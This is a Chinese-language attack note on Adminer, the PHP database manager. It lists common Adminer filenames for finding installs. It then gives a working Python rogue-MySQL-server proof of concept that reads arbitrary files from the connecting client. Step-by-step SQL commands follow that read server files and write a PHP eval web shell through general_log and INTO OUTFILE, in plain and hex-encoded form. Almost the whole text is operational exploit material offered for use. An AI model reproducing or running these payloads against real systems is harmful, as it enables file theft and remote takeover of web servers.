默认文件名:adminer.php
一些版本的文件名
adminer.php
sql.php
adminer-4.7.7.php
adminer-4.7.6.php
adminer-4.7.5.php
adminer-4.7.4.php
adminer-4.7.3.php
adminer-4.7.2.php
adminer-4.7.1.php
adminer-4.7.0.php
adminer-4.6.3.php
adminer-4.6.2.php
adminer-4.6.1.php
adminer-4.6.0.php
adminer-4.5.0.php
adminer-4.4.0.php
adminer-4.3.1.php
adminer-4.3.0.php
adminer-4.2.5.php
adminer-4.2.1.php
adminer-4.2.0.php
adminer-4.1.0.php
adminer-4.0.3.php
adminer-4.0.2.php
adminer-4.0.1.php
adminer-4.0.0.php
adminer-3.7.1.php
adminer-3.7.0.php
adminer-3.6.4.php
adminer-3.6.3.php
adminer-3.6.2.php
adminer-3.6.1.php
adminer-3.6.0.php
adminer-3.5.1.php
adminer-3.5.0.php
adminer-3.4.0.php
adminer-3.3.4.php
adminer-3.3.3.php
adminer-3.3.2.php
adminer-3.3.1.php
adminer-3.3.0.php
adminer-3.2.2.php
adminer-3.2.0.php
adminer-3.1.0.php
adminer-3.0.1.php
adminer-3.0.0.php
adminer低版本可以利用mysql服务端恶意读取客户端文件:https://xz.aliyun.com/t/8309
POC
#coding=utf-8
import socket
import logging
import sys
logging.basicConfig(level=logging.DEBUG)
filename=sys.argv[1]
sv=socket.socket()
sv.setsockopt(1,2,1)
sv.bind(("",3306))
sv.listen(5)
conn,address=sv.accept()
logging.info('Conn from: %r', address)
conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)
logging.info("want file...")
wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename
conn.sendall(wantfile)
content=conn.recv(9999)
logging.info(content)
conn.close()
随意登录,报错得到绝对路径
攻击机执行命令准备读取文件:
python poc.py "C:\phpstudy_pro\WWW\1.php"
输入服务器地址,账号密码随意,点击登录
成功读取到文件内容
攻击机新建库和表,开启外连
create database adminer;
use adminer;
create table test(text text(4096));
访问靶机,输入攻击机的数据库信息
靶机需要 secure_file_priv 为空,为 null 导出不了
执行命令
load data local infile "C:\\phpstudy_pro\\WWW\\1.php" into table test FIELDS TERMINATED BY '\n';
查看表信息,成功读取到文件
show variables like '%general%'; #查看配置信息
set global general_log=on #开启general log模式
set global general_log_file='C:\\phpstudy_pro\\WWW\\shell.php';
select "<?php @eval($_POST['1']);?>";
连接 webshell
select 0x3c3f70687020406576616c28245f504f53545b315d293b3f3e into outfile "C:\\phpstudy_pro\\WWW\\1.php";